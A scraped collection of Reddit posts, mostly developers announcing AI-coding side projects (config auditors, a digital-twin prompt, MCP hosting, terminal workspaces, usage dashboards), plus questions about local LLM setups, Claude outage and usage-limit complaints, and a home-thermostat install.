r/ClaudeAI Original-Shower-3346

I used Claude Code to build a CLI that audits AI coding agent setups — 2,431 checks across 8 platforms

I built Nerviq entirely with Claude Code over the past few weeks. Claude wrote ~95% of the code —

the audit engine, harmony cross-platform detection, synergy routing, all 8 platform modules,

and the test suite (91 tests). I directed the architecture and verified the output.

The project itself audits how well a repo is configured for AI coding agents. It started because

I was running Claude Code, Cursor, and Copilot on the same repo and realized their configs

were contradicting each other. Nobody was checking for that.

What it does:

- Scores your AI agent setup 0-100 across 8 platforms

- Checks 2,431 things: instructions files, hooks, deny rules, MCP config, verification loops

- Detects cross-platform config drift (harmony-audit)

- Auto-fixes what it can (nerviq fix)

npx u/nerviq/cli audit

It's free and open source (AGPL-3.0). Zero dependencies, runs locally.

Most repos I tested score 10-20 out of 100. Common misses:

- No deny rules (agent can read .env files)

- No verification commands

- Multiple AI platforms with conflicting configs

- Hooks in files but not registered in settings

What Claude Code was great at: generating the 2,431 check functions from research docs,

building the SVG chart dashboard, and writing platform-specific detection logic for 8

different config formats. What I had to manually fix: false positive rates on stack-specific

checks and cross-platform capability matrices.

GitHub: https://github.com/nerviq/nerviq

Happy to answer questions about using Claude Code for building dev tools.

r/ClaudeAI whystrohm

I built a Digital Twin prompt and pushed it to GitHub. It scans your writing, maps how you think, builds a System Prompt of you, and generates a visual dashboard. Free.

Built this over the weekend. Pushed it to GitHub so anyone can run it.

It's a Digital Twin — a prompt that reverse-engineers how you think, talk, and make decisions, then packages it into a reusable System Prompt.

Here's what it actually produces:

  1. Scans your writing and runs quantitative analysis — word frequency, sentence structure, metaphor mapping, crutch phrase detection, topic clustering

  2. Maps four dimensions: linguistic fingerprint, cognitive pattern, decision logic, knowledge domains

  3. Builds a complete System Prompt — identity, tone rules, decision logic, interaction rules. Copy-paste ready. Load it into any AI and it operates as you.

  4. Stress-tests the prompt with a scenario designed to break character

  5. Generates a visual dashboard — word clouds, bar charts, topic radar, tone spectrum. Saved as an HTML file you open in your browser.

  6. Names the one pattern you didn't know you had

I ran it on 60 files of my own writing. 27,342 words. Some of what came back:

- Never once written maybe, perhaps, or I think. Zero softening language across 27K words. Had no idea.

- 309 architectural metaphors — pipelines, layers, stacks. Zero organic ones.

- I define everything by what it's NOT before saying what it is. Every document. Never noticed.

The stress test: gave it a 50K offer for manual labor that breaks every rule in the extracted decision logic. The Twin turned it down and counter-pitched a systems version. Which is what I would have done.

Three depth levels:

- Any LLM: paste the prompt + your writing. ~70%

- Claude with memory: just paste the prompt. ~85%

- Claude Code: scans your files, runs the full 7-step pipeline, generates the dashboard. 100%

Works on ChatGPT, Gemini, Claude, local models. The Claude Code version goes deeper with full quantitative analysis.

github.com/whystrohm/digital-twin-of-yourself

Free. MIT. Includes a universal prompt (works on any LLM), a full 7-step Claude Code pipeline, and a packaged Claude skill you can install in one command:

git clone

https://github.com/whystrohm/digital-twin-of-yourself.git ~/.claude/skills/digital-twin

Safety first: only paste YOUR writing. Scrub names and client details before scanning. The prompt extracts principles, not data — no identifying information in the output.

Try it and let me know what you find. The patterns you don't know about are the interesting ones. Curious what surprises people.

r/SideProject oldtimeguitarguy

I built a hosting platform so MCP server developers can get paid for what they build

I've been working on mctx (mctx.ai) — a hosting platform for Apps for AI. The idea is simple: developers connect their GitHub repo containing an MCP server, set a monthly subscription price, and deploy. mctx handles hosting, auth, payments, and one-click publishing to the MCP ecosystem. Developers earn 80%, we keep 20% and handle the rest.

I built this because I believe MCP is going to change who gets to compete in the software market. When people interact with AI directly instead of through traditional UIs, a solo developer with a great MCP server can go head-to-head with enterprise tools. Why sign up for Notion AI when you can subscribe to a simple Notes app through Claude? That's the future I'm building for.

To make it easy to try, I made all of my own Apps free — Notes, Todos, Bible Study, Hidden Empire (a text adventure based on Zork), and a few others. When you sign up, you're automatically subscribed to a handful of them so you can see how it works immediately.

Tech stack: Cloudflare Workers, D1, Workers for Platforms, Auth0, Stripe Connect, Hono, Drizzle ORM. Happy to go deep on any of it.

Site: mctx.ai

r/ClaudeAI btangonan

Built an open-source macOS app that gives every Claude project its own /buddy companion

When /buddy launched on April 1st, I fell in love with it. It has room for improvement, though: it's one pet per account, its commentary comes from a small model with a 5,000-character window, and you can't easily transfer its feedback back into Claude Code session.

Because of this, I built a MacOS app called Anima.

Every project gets its own ASCII companion. Your token usage earns @nim@ (in-app currency) you spend on re-rolls. Your buddy polls all active sessions and surfaces observations about your work. 8 species, 5 rarity tiers, stat cards.

4MB. Tauri + Rust. Open source. MIT licensed.

https://github.com/btangonan/anima

First app I've ever shipped, would love feedback.

https://i.redd.it/jbd9guionltg1.gif

r/SideProject ahmedjaved6

Built a landing page for an idea on my birthday, a platform for broke builders who are almost there.

I'm a solo builder from Guwahati, Assam. I have ideas. I have skills. But I keep hitting a wall I cannot climb alone no money to hire, no co-founder, projects sit at 90% forever.

So I started building Broke Founders.

The idea: skilled builders find each other, declare scope and equity upfront, build with free tools, and split what the product earns. No salaries. No pitch decks. No equity negotiation theatre.

Time is the only currency.

Would love to know if this resonates with anyone especially if you've got projects that are almost done and never shipped.

https://broke-founders.vercel.app

r/SideProject Zanoshky

Knit your memories

I've been building Knitty - a micro-journal where each subject (pet, person, trip, health, car) gets its own visual timeline. AI writes entries from your photos. Stack: NestJS + React + AWS Bedrock.

knitty.app - would love early feedback.

First 100 people will get PRO free access.

r/ClaudeAI lemon1825

I used Claude Code to build an open-source AI agent verification tool — gan-harness

I built gan-harness entirely with Claude Code (Opus). It's a verification layer that

runs build, test, lint, typecheck, and secret scanning on AI agent output.

## What it does

When you run an AI agent (Claude Code, LangChain, etc.) to write code, gan-harness

verifies the output before it ships:

npx gan-harness verify

It auto-detects your project type (Node/Python/Rust/Go) and runs 5 checks locally.

## How Claude Code helped

- Claude Code wrote the initial TypeScript port from my bash scripts

- Security review was done by Claude's code-reviewer and security-reviewer agents

- Found and fixed 2 CRITICAL command injection vulnerabilities during the review

- All 42 tests were written with Claude Code's TDD workflow

## The problem it solves

AI agents fail in production in predictable ways: infinite loops, leaked secrets,

hallucinated code passing self-evaluation, cost explosions. This tool catches those

patterns with static checks before expensive API evaluation.

## Free to try

Fully open source, MIT license. No signup, no API key needed:

npx gan-harness init

npx gan-harness verify

GitHub: https://github.com/VIVEHACKER/gan-harness

Feedback welcome — especially on what checks you'd want added.

r/ClaudeAI Existing-Bicycle939

Can Claude Generate an Entire Web App from Detailed Requirements?

I’ve got a legacy web application built on outdated tech, and I’m planning a full rewrite using a modern stack with cleaner, well-structured code. As part of that, I’ll need to document the entire set of requirements, which will be fairly extensive.

I’ve experimented with Claude’s free version to generate small chunks of code (around 50–100 lines), and it worked surprisingly well. That got me thinking: if I provide very detailed requirements, is it realistic to generate an entire website using the paid version?

Time and cost aren’t major concerns here. I’m more interested in whether this approach is actually feasible and reliable compared to using a team of developers. Has anyone tried generating a full application this way?

r/SideProject Quzr27

Terminal tabs don’t scale, so I built a spatial workspace

Hey!

Ive been running multiple Claude Code sessions at the same time and constantly losing track of which terminal is doing what.

So I built Korum — a spatial terminal workspace where each terminal lives on an infinite canvas. You can drag, resize, zoom, add notes next to terminals, and everything persists between sessions.

Built with Tauri 2 (~3.4 MB), macOS only for now.

Still very early — v0.1.0-alpha. Would love to hear if this is something you'd actually use.

GitHub: https://github.com/Quzr27/korum

r/SideProject sigitaszai

I thought I didn’t spend that much on food… I was wrong

Hey,

At the start of last month I decided to do something simple: just track everything I spend.

No budgeting, no trying to save money, nothing like that. I just wanted to see what my normal month actually looks like.

I managed to do it properly for about 15 days straight (I know I'm a bit lazy).

Pretty quickly one thing stood out… lunch at work.

It never felt expensive. Just grabbing something quick, €8–€12, nothing crazy.

But when I actually looked at it over a full month, it came out to around €350 just on lunch alone.

That was a bit of a reality check.

So the next month I didn’t do anything extreme, just started cooking lunch for the next day instead of buying it from cafeteria.

Same routine, same work, just changed that one thing.

After another month, I checked again… and I had saved a bit over €200 without really feeling it.

That’s when it clicked for me - it’s not the big expenses, it’s the stuff you don’t notice. The annoying part is getting to that point. Tracking things consistently is way harder than it sounds. I’ve tried before and always dropped it after a few days.

That’s actually why I ended up building a budget tool for myself.

Main thing I changed was removing friction. I added a simple AI chat where I can just type something like “spent 10 on lunch” and it logs it. No forms, no effort.

That’s the first time I’ve been able to stick with tracking long enough to actually see patterns like this.

Now I’m turning it into an Android app because I want to use it daily without thinking about it.

I’m close to releasing it, but there’s one catch: Google Play requires at least 12 people to actively test the app for 14 days before I can publish it publicly.

So I’m looking for a small group of people who are up for trying it and giving honest feedback along the way.

If you want to try it just comment “Enroll me” and I’ll DM you with info.

If you actually use it and give feedback, I’ll give you lifetime Pro access.

Curious if anyone else had a similar “small expense adds up” moment.

r/ClaudeCode Gh0stReader

Update - This issue additionally affects login on other surfaces, such as Claude.code.Apr 06, 2026 - 15:54 UTC

Update - We are continuing to work on a fix for this issue.
Apr 06, 2026 - 16:17 UTC

r/SideProject mlvps

Drop your startup URL, I'Il set up a free lifetime NullMark link for you

I'm the founder of NullMark, a tool that fixes one specific conversion killer: around 40% of social media clicks open in in app browsers (e.g: Instagram, TikTok, Facebook), which breaks checkout, kills cookie attribution, and loses you real sales. (not even apple pay works in there)

So I built NullMark. A Link redirect service that opens Your Link in the native browser instead of the broken in-app ones.

One link swap. 5 seconds. No code.

Drop your product/startup below and I'll personally send you a free lifetime link (normally $30). The only ask: Give me some honest feedback. I launched on ProductHunt yesterday and got little to no traction.

(Yes this is self-promo, but I genuinely want to help! Limited spots.)

r/LocalLLaMA Extra-Designer9333

Dataset curation for LLM Research project that involves pre-training

Hello everyone,

I'm a junior researcher working without supervisor on novel RoPE enhancement architecture that involves pre-training from scratch. I'm thinking of what to do with dataset curation now. I have come up with the domain distribution that involves web, wiki, code and math pre-training data. My question is, should I have multiple datasets per domain, or is it better to use a big dataset per domain, like for example having FineWeb only for web, or splitting web domain between FineWeb and say DCLM. My pre-training budget is gonna be 50B tokens.

Thank you everyone in advance🙏

r/homeassistant CaptainRedsLab

As a heating professional I hate battery thermostats, so I went overboard and self-hosted a touchscreen communicating stat for my 1975 furnace

Red Seal Plumber and Gas Fitter here. Battery thermostats drive me nuts, I've seen dead batteries freeze water/sprinkler lines and flood entire units during Canadian winters. When I moved in and found one on my wall, with a half installed Nest. I knew they had to go.

Old thermostat set-up

Went with a Lennox iComfort E30 communicating thermostat. The display on the wall just handles communication, all the control wiring stays at the Smart Hub at the furnace. Only needed 4 wires to the wall instead of the usual 5-7 for a Nest or Ecobee.

New thermostat

Got it into Home Assistant through the lennox HACS integration running locally. No cloud, no subscription. I am planning on getting Temperature and Humidity sensors in the near future. Any bulletproof options people love that would pair nicely?

The furnace is from 1975 and still going. New one coming this summer and that's when the smart thermostat really opens up with staging and variable fan speed through HA.

Old ass furnace

Wiring diagram

Full disclosure: not affiliated with Lennox. Just a trades guy who does tech stuff on the side and got my hands on one of these thermostats for a good price.

Finished set-up

Anyone else self-hosting their HVAC controls? Curious what setups people are running. I put together a video documenting the process here: https://youtu.be/-U0xa6u9bgI

r/LocalLLaMA Loose-Masterpiece537

Desenvolvi um "FATIADOR" de contextos de LLM e queria a opinião de vocês.

Depois de vários e vários meses tendo problemas com a IA com:
- Perda de Contextos
- Nunca lembra algo específico no chat

Resolvi desenvolver que eu chamo de "FATIADOR", ele faz a separação do contexto completo por blocos separados.

O Problema era:
Quando enviamos parágrafos gigantes com dúvidas misturadas, pedimos várias coisas diferentes e a IA, acaba se perdendo no meio do caminho.

Solução que encontrei é:
Implementar uma arquitetura chamada de "Double-Call Architecture."

O Motor recebe o texto complexo.
Uma LLM menor faz o trabalho de "Fatiar" a entrada em "contextos" separados e lógicas independentes.
Cada contexto é processado individualmente, garantindo isolamento total de cada resposta.

Payload final temos um retorno dentro `reconciled_blocks` separado por UUID para cada bloco, facilitando o entendimento dos blocos para a IA e melhorando a resolução, caso tenha dúvidas em uma pergunta específica, fica mais fácil da IA entender o que está realmente falando.

Com o "FATIADOR", conseguimos resolver uma questão única sem atrapalhar o chat completo.

Exemplo do payload final:

```json { "uuid": "{UUID_ÚNICO}", "session_id": "{SESSION_ID}", "timestamp": "{TIMESTAMP}", "trace_id": "{TRACE_ID}", "type": "result", "subtype": "success", "duration_ms": 0.0, "duration_api_ms": 0.0, "is_error": false, "num_turns": 1, "result": { "reconciled_blocks": [ {id:(UUID_PERGUNTAS_1_2_3), intent_title:(INTUITO DA PERGUNTA), semantic_tags:(TAGS_DA_PERGUNTA), cerebro_memory_key: (context_id:(UUID_SALVO_MEMORIA), resolution: (RESPOSTAS) }]}, "total_cost_usd": 0.0, "usage": {} } ``` 
r/LocalLLaMA Longjumping_Fly_2978

With Qwen 3.6 Plus now surpassing 5T tokens on OpenRouter, I expect major leaps in coding performance for next Qwen models.

Really I expect wild progress for chinese ai.

r/SideProject Independent-Respect2

Too Many AI Tools, Too Much Noise. How Do You Actually Get Started?

Hey everyone,

I wanted to share a bit of my situation and hopefully get some guidance from people with more experience in this space.

I don’t come from a strong coding background. The only real experience I have is using RStudio for statistical and data analysis projects during university and also just a few days ago I automated a small part of my job by scraping some info i needed. Recently though, I’ve gotten really interested in AI, especially building automations, SaaS, and small tools (agents, workflows, etc.), both for my job and for personal projects.

The problem is… I’ve been feeling pretty overwhelmed. Every time I go on X (Twitter), I see new tools, new frameworks, new “this is better than that,” and constant GitHub repos popping up. One day it’s one tool, the next day it’s something completely different that’s supposedly “way better.”

At this point, I feel a bit lost trying to figure out what actually matters and what I should focus on.

So my question is:

For someone in my position (beginner/intermediate, limited coding experience), what are the core tools or stack I should focus on to start building useful projects with AI?

How do you avoid getting overwhelmed by all the noise and constant new releases?

I’m not trying to chase every new shiny thing, I just want a solid foundation to start building real & practical projects.

Would really appreciate any advice.

Thank You!

r/ClaudeCode Beneficial_Carry_530

IS claude down?

Getting a login error type bug that usually surfaces when it is down.

Please run /login · API Error: 401 {"type":"error","error":{"type":"authentication_error","message":"Invalid authentication

credentials"},"request_id":"req_011CZnpad3nqtk3NN936w16R"}

OAuth error: timeout of 15000ms exceeded

r/LocalLLaMA Willing-Toe1942

Gemma4 on Strix halo is it doable for agentic usage?

Hi as the title said, I'm corrently considering buy strixhalo laptop
Would it be possible to have opencode or do agentic work with gemma4 26B ?
If you run it could you please share the benchmarks

r/ClaudeCode SnazzySolutions

Claude Code not checking any info

I went from using this 40 hours a week, to getting pissed off using it for 30.

Something changed, and 90% of our responses are dog shit.

I just gave it an asana task to build a quiz that puts someone in a category, so it needs basic scoring.. after 3 times of it swearing one would work for us, I bought it. In 20 seconds of me asking it "can you do it now?" it responded: "Here's what I found after digging through TQB's internals: TQB can't do this quiz natively."

BEYOND PISSED. It's failing to quality check ANYTHING.

Even the app is getting 90% of stuff wrong.

I had a fitness competition, and when I ask it to check my Heart Rate daily, it never once gets dates right, it's like "Good luck with Hyrox in 5 days", bro 7 days ago you said that exact same thing". I just told you I completed it, WHAT!?

r/LocalLLaMA FirefoxMetzger

Anyone here know a good browser-based LLM app built on webGPU?

I'm not asking about a locally hosted backend that has a browser-based frontend (e.g., OpenWeb UI, stuff built on top of Ollama, etc.). I'm specifically asking about something built on top of WebGPU (e.g., via transformers.js or WebLLM) so that the inference happens directly in the browser.

I want build with it and wonder if someone here has built on top or seen something built on top so I can find footguns early.

r/StableDiffusion JealousIllustrator10

How can I generate same type text to speech voice which veo 3 generate in 3d Pixar art video.like health viral video

how can I do it?

r/ClaudeCode lagoJohn

Claude Credit $200

I have the $100 subscription at work and for personal use. I manage my works account and we were just credited $200 to our Team Plan. Did anyone get something similar for their personal account or is it just for a Team plan?

r/ClaudeCode Livid_Switch302

Anyone actually pushed a healthcare prototype with Claude Code, how far does it hold up on compliance?

I'm curious how far it'll actually go in terms of compliance. I mean a cardiologist litertally placed top 3 in a hackathon with an agentic tool so wondering where the ceiling really is in production scenarios.

r/SideProject dafqnumb

Claude wasn't coming up with video analysis so I did it with help of it

i wanted to use claude's reasoning on video files without the constant workarounds & juggling to gemini, so i sat down and built using claude to help me build vidclaude.

it's a pypi package that lets you process video content so claude can actually "see" and analyze what's happening.

what it does:

handles frame extraction and optimization.

feeds visual context to claude's multimodal window.

makes video analysis actually usable in a python workflow.

if you've been wanting to talk to your videos using claude, this is for you.

check out here: https://pypi.org/project/vidclaude/

try & report any issues

r/StableDiffusion Icy_Agency923

Is there any video generation options that would be good enough to make a 52 second video that looks real?

People are claiming a bird in a submarine is an AI video but I believe it is clearly real since the video is 52 seconds long with only one cut.

Reddit post

Instagram source video

Is there any video generation options that could have made this video?

r/LocalLLaMA _derpiii_

Help: Model selection for local RAG on M2 Ultra 64GB?

Purpose: Local RAG (anythingLLM) using local model as fallback. datasource: ~100 books.

I'm starting my due diligence (asking Claude, reddit search), and would appreciate pointers in the right direction 🙏🏻. I'm so new to this, getting a bit overwhelmed at how little I know.

Questions:

  • What's the effective RAM available for local models left after OS overhead? Claude says 56GB. Is that correct?
  • What's the best models for each RAG step: embedding, retrieval, generation, and eval (test and benchmark harness)? Are there any steps I'm missing?
  • Just realizing running multiple models means memory has to be budgeted between them (or deal with page swapping them in/out memory at each step)?
  • How to balance going with smaller full model vs larger quantized model (besides benchmarking results)?

There's so many little nuances I didn't know existed.

And on the topic of RAG's:

Any high quality resources to get bootstrapped (tutorials/guides/projects/channels)?

I've been looking into this for a couple nights, and the most important part seems to be eval harness. I've never implemented one and would be nice to have a best practices rulebook.

And yes I know I can (and have) asked Claude, but I don't fully trust it because I don't know, what I don't know. Kind of in decision paralysis mode.

Would appreciate any pointers and more importantly factors I haven't considered to build a robust RAG system.

r/SideProject Electronic_Stand_764

Starting a side project

I currently bachelor of computer science and in my second semester. Im thinking starting a side project or anything that could boost up my resume. I think im a decent student but having a good resume could probably helped me in the future. Currently I only know the basics of C++ and Html,Java script(both i only learned during highschool) . So i would like to hear you guys opinion.

  1. What languange should i learn first.
  2. 2.What beginner side project that i can do
  3. What should i do when i finish my side project
  4. Give me advice on my project development

additional advice/opinion would be grateful.

r/Anthropic shanraisshan

Claude Code v2.1.92 introduces Ultraplan — draft plans in the cloud, review in your browser, execute anywhere

r/LocalLLM Oracles_Tech

LLM Threat Intelligence Platform

The free, open-sourced community tier (launched mid March) saw 300+ downloads last month with little to no marketing. If you were one of those developers who downloaded (pip install ethicore-engine-guardian), I developed the Ethicore Engine™ API with you in mind! Free tier now includes FULL threat library! For anyone interested in our Multi-layer Threat Intelligence & End-to-End Adversarial Protection Framework, there a now multiple ways to protect your applications; just pick the tier aligned with your deployment scope and compliance requirements. Let's continue to innovate with integrity!

r/LocalLLaMA Secure_Archer_1529

Deep Local Autonomous Research for R&D — what’s your actual setup?

I’m looking to expand my understand of how serious R&D users are doing local or mostly-local research workflows in practice.

I’m especially interested in people doing things like:

* deep research

* long-context analysis

* extraction/synthesis across many sources

* autonomous or semi-autonomous agent workflows

* privacy-sensitive work

A few things I’d love to hear:

  1. What hardware are you running?

  2. What software stack are you using?

  3. Which models are your daily drivers?

  4. How do you handle search/retrieval — fully local, Exa, Tavily, Brave, custom tools, MCP, something else?

  5. How private is your setup in reality — fully local, hybrid, or selective cloud?

  6. What works surprisingly well?

  7. What did you try that sounded promising but failed in practice?

  8. What are your biggest bottlenecks now — speed, reliability, context, tooling, cost, or setup complexity?

  9. Are you using a simple workflow or a more agentic system?

  10. If you had to rebuild from scratch, what would you do differently?

I’m less interested in theory and more in real-world “this is what actually works” setups.

r/SideProject yopi1333

Do you think AI news apps will fully replace traditional news apps in the next 2 years?

Been thinking about this a lot lately. I switched to CuriousCats AI as my main news source a few weeks ago, and honestly, the gap between it and something like Google News or Apple News feels pretty big already.

Like the traditional apps are still basically just aggregators, they pull headlines, show you a feed, and let the algorithm decide what gets your attention. Most of them are still ad-heavy and optimised for time spent, not information quality.

The AI ones feel fundamentally different. You get summaries, context, multiple perspectives on the same story, and in some cases, you can literally ask questions about a story and get background. That is a different product entirely, not just a shinier version of the same thing.

I don't think mainstream users will switch that quickly. A lot of people are still very habitual about their news apps. Google News and Apple News have massive distribution advantages, too, since they come pre-installed on most phones.

So I am curious what people here think. Do you think AI news apps cross the mainstream tipping point within 2 years or does it take longer? And is anyone else already using one as their main source?

If you want to see what I mean, CuriousCats AI is free to try on both iPhone and Android. I would be curious if others have the same experience after trying it.

r/LocalLLaMA EmPips

Qwen3.5-397B is shockingly useful at Q2

Quick specs, this is a workstation that was morphed into something LocalLLaMa friendly over time:

  • 3950x

  • 96GB DDR4 (dual channel, running at 3000mhz)

  • w6800 + Rx6800 (48GB of VRAM at ~512GB/s)

  • most tests done with ~20k context; kv-cache at q8_0

  • llama cpp main branch with ROCM

The model used was the UD_IQ2_M weights from Unsloth which is ~122GB on disk. I have not had success with Q2 levels of quantization since Qwen3-235B - so I was assuming that this test would be a throwaway like all of my recent tests, but it turns out it's REALLY good and somewhat usable.

For Performance: , after allowing it to warm up (like 2-3 minutes of token gen) I'm getting:

  • ~11 tokens/second token-gen

  • ~43 tokens/second prompt-processing for shorter prompts (I did not record PP speeds on very long agentic workflows to see what caching benefits might look like)

That prompt-processing is a bit under the bar for interactive coding sessions, but for 24/7 agent loops I have it can get a lot done.

For the output quality: It codes incredibly well and is beating Qwen3.5 27B (full), Qwen3.5 122B (Q4), MiniMax M2.5 (Q4) GPT-OSS-120B (full), and Gemma 4 31B (full) in coding and knowledge tasks (I keep a long set of trivia questions that can have different levels of correctness). I can catch hallucinations in the reasoning output (I don't think any Q2 is immune to this) but it quickly steers itself back on course. I had some fun using it without reasoning budget as well - but it cannot correct any hallucinations so I wouldn't advise it to be used without reasoning tokens.

The point of this post: Basically everything Q2 and under I've found to be unusable for the last several months. I wanted to point a few people towards Qwen3.5-397B and recommend giving it a chance. It's suddenly the strongest model my system can run and might be good for you too.

r/SideProject justaguy89432

I built a free RAM price tracker that compares DDR4/DDR5 across 6 retailers

I'm a solo dev in Richmond, TX and I got tired of manually checking RAM prices across different stores every time I wanted to upgrade. So I built RamRadar.

It tracks DDR4 and DDR5 prices in real time across Amazon, Newegg, Best Buy, B&H Photo, Walmart, and eBay. You get historical price charts so you can see if a "deal" is actually a deal or just marketing, all-time low alerts, and a build wizard that matches compatible RAM to your motherboard.

Completely free, no account required, no ads. Built with Next.js, Supabase, and deployed on Vercel.

Some things I learned building it:

  • Price scraping at scale is harder than it sounds. Each retailer has different anti-bot measures and data formats. Amazon's Product Advertising API is the cleanest but has strict rate limits.
  • The build wizard (matching RAM to motherboard compatibility) required building a database of motherboard specs which I had to enrich with AI because no single source has all the data.
  • Keeping 6 data sources in sync and deduplicating the same product across retailers was the most underrated engineering challenge.

I'm a one-man shop (Random Llama Software) so feedback is really valuable. If something's broken or you want a feature, I'm all ears.

https://ramradar.app

r/StableDiffusion SkydiverUnion

MyFriendDemon my first ai generated Music and Video

Hi guys, this is my first AI-generated music and music video. I hope you like it I’d really appreciate any feedback. I tried to keep the consistency of the plush toys as good as possible.

r/comfyui Ausschluss

ComfyUI slow after update to 0.18

I finally updated from 0.14 to 0.18 and noticed a dramatic slowdown in operation. It used to take my workflows 1-2 seconds to start KSampling, whereas now it needed about one second for each node leading up to the actual generation, thus introducing a dramatic slowdown.

If you are in the same boat, try launching ComfyUI with the option --disable-dynamic-vram. That fixed it for me.

r/AI_Agents SoySoft

What agent should I use?

Hi,

I would like the agent to manage an online marketplace very similar eBay

  1. I take 6 photos of a product

  2. Photos go into a folder on my Mac

  3. AI agent reads the photos, identifies the item, writes the title/description/tags/price

  4. Bot automatically posts the listing to marketplace acting like a human (random delays, natural timing)

  5. When it sells, bot automatically buys a shipping label and uploads tracking to Depop

  6. Agent also monitors my emails for AliExpress/Temu deliveries and notifies me when new stock arrives

If that makes sense and is possible please lmk

Thanks in advance

Cameron

r/Anthropic RealSnazzie

Claude is goated. Built the most advanced Sim Racing telemetry app.

I wrote zero code for this project, its all pure guidance and persistence from 8 years of software experience and 5x subscription. Sure the code can be messy, but functionality and usability is all that matters, end user doesnt care about how the code looks. And personally i dont care how the code looks as im not the one maintaining it, claude is.

The biggest win was claude figuring out how to decompress microsoft's LZX compression algorithm that people have only been able to reach 40%, claude got 100% in half a day of self iteration with parallel worktrees.

Without claude, instead taking less than a month to build, it would have taken me multiple years. The foundation took one evening, then it was few weeks of iterating on features.

Check it out
https://github.com/SpeedHQ/RaceIQ/blob/main/assets/screenshots/README.md

https://github.com/SpeedHQ/RaceIQ

r/ClaudeAI Alone_Strawberry_797

Scheduling Claude for a 6am joke is oddly life-changing

I used to wake up and manually say “good morning” to Claude just to kick things off.

Every. Single. Day.

Then scheduling dropped.

Now Claude sends me a joke at 6am, and my usage window is perfectly aligned with my waking hours. Anyone have a similar routine as me hahahaha

Side note: ever noticed LLMs seem to have a favourite joke? Ask any of them for a joke and there’s a high chance you’ll get something about scientists not trusting atoms… because they make up everything.

r/comfyui TheRedTeamMan

No link found in parent graph for id [129:85] slot [7] cfg I2V Wan 2.2

I just wanted to try Comfy UI, but when I try using Image to Video (Wan2.2), I keep getting Error "No link found in parent graph for id [129:85] slot [7] cfg" I don't understand what I should connect. Many guides says to use Ctrl+F to locate the node, but Ctrl + F is not working in this version of Comfy UI

r/homeassistant Dstln

Import historical data from Envoy?

Envoy connects great to HA for solar data, but for whatever reason, it doesn't import any historical data even though it's available to the system. Is there a way to do this, or am I missing something with the setup?

Thanks!

r/SideProject Life-Bet2940

ember | Love is blind in your pocket

With declining birth rates, increasing isolation, and growing loneliness in society, I’m trying to build a platform focused on safety and communication.

After using dating apps on and off for 10 years, I feel like they’ve stopped evolving. Every app looks and feels the same. They just leave you more depressed after each attempt. It feels very difficult to be authentic — you have to present a polished version of yourself that often doesn’t match who you really are. And if you do match with someone, you’re expected to meet within a day without actually getting to know each other. Often you match but never get a reply.

I’ve talked to many people with similar experiences, and after searching online, I’ve realized this is — and has been — a very common phenomenon.

The concept behind ember, is quite simple. You register by having a conversation with ember (AI). After answering a few questions, you review and approve your profile. The questions it's asking about is who you are and who you’re looking for. Your answers is compared with all approved users. Your profile is never publicly visible, meaning you can be exactly who you are. When you match with someone, you receive a short description and an explanation of why you were matched.

There are several safeguards to prevent harmful content or bad behavior, as well as an anti‑ghosting feature that gives you a limited time to respond before the match moves on.

The app is currently waiting for App Store and Google Play review. Fingers crossed it will be out soon.

Feel free to reach out with feedback — it would be greatly appreciated.

Happy Easter! /William

r/ClaudeCode Ambitious-Garbage-73

Claude Max 20x: it's Monday noon and I've already burned through 40% of my weekly limit. Seriously thinking about switching to OpenAI Pro just for Codex CLI

https://preview.redd.it/8q23mn0udltg1.png?width=939&format=png&auto=webp&s=d12c0bd0e730ea491f6a894f1ae76dd32bcb877d

On the Max 20x plan. Weekly limit resets Saturday. It's Monday noon and I'm already at 40% used, 38% on Sonnet.

That's not even the worst part. Extra usage enabled with a monthly cap — already burned 87% of it and it's the 6th.

My whole use case is Claude Code. Long sessions, browser automation, agentic tasks that run for hours. The 20x multiplier sounds like plenty until you do a full day of heavy terminal sessions and watch the percentage move in real time.

Been looking at OpenAI Pro (200 dollars/month). Not for ChatGPT. For Codex CLI — their version of Claude Code, terminal-native, agentic, handles multi-step coding. It launched recently enough that I haven't found many real comparisons yet.

Anyone here actually switched or is running both? Specifically for agentic coding, not just chatting:

- Does Codex CLI hold up for long sessions or fall apart on complex multi-file tasks?

- How does rate limiting on Pro compare?

- Is 200/month worth it if Claude Code is your primary use case anyway?

Not trying to rage-quit Claude. But paying for Max 20x and hitting limits by Monday is a rough spot.

r/SideProject tailaiw

Wordie — Vocabulary that sticks

Two things about kids' vocabulary apps drove me to build my own:

Quizzes are useless for real learning. Every vocab app is built around multiple choice. But picking the right word from a list is just pattern matching — it has almost nothing to do with actually understanding a word. The research is consistent: producing language (writing your own sentence) builds far deeper retention than passive recognition. Yet I couldn't find a single kids' app that makes them write sentences.

Most apps ignore the science of memory. There's decades of cognitive research on the forgetting curve — you need to revisit words at increasing intervals for them to stick. My kids would "learn" a word Monday and it was gone by Friday. Every time. Spaced repetition is the proven fix, but most kids' apps treat every word the same: learn once, quiz once, done.

Extra context that shaped the design: I'm a non-native English speaker. My kids are born here and bilingual. Helping them with vocabulary is tricky because I can't always judge if their sentence sounds natural.

So I built Wordie (gowordie.com):

  • AI generates short reading passages with vocabulary matched to the child's level
  • Kids write their own sentences for each word — no multiple choice anywhere
  • I review and leave comments before words advance. This became unexpectedly warm — like passing notes with my kids. "Nice sentence but make it funnier." "Dad, you spelled your comment wrong."
  • AI assistant helps me check if sentences use words correctly — built this because I needed it as a non-native speaker, but it's useful for any parent
  • Spaced repetition based on actual memory science — struggling words come back sooner, mastered words space out over days and weeks

Why it's free: This is a passion project for my family. No ads, no paid tier, no monetization. I just want to share it with other parents who might have the same frustrations. If it ever grows enough that server costs become a real problem, I'll figure that out then.

Unexpected discovery: The parent review with comments was originally just a correctness gate. It turned into the emotional core of the app. My kids and I pass notes back and forth. It's the feature I didn't plan that ended up mattering most.

Would love feedback from builders and parents.

gowordie.com

r/ClaudeAI Lopsided_Yak9897

self-hosted monitoring for Claude Code & Codex

About a month after our team started using Claude Code, someone asked in Slack how much we were spending. Nobody knew. We looked around for a monitoring tool, didn't find one we liked, and ended up building our own.

Zeude is a self-hosted dashboard that tracks Claude Code and OpenAI Codex usage in one place. You get per-prompt token and cost breakdowns, a weekly leaderboard (with cohort grouping if your org is big enough to care), and a way to push skills, MCP servers, and hooks to your whole team from the dashboard instead of chasing people on Slack

The big things in v1.0.0:

Windows support. It was macOS/Linux only before. Now the whole team can use it regardless of OS.

Codex integration. A lot of teams use both Claude Code and Codex, and tracking only one of them gives you half the picture on costs. Now both go through the same dashboard.

Per-user skill opt-out. Team skill sync was already there, but it was all-or-nothing. Now individuals can turn off skills they don't want. Turns out not everyone wants every skill pushed to their machine.

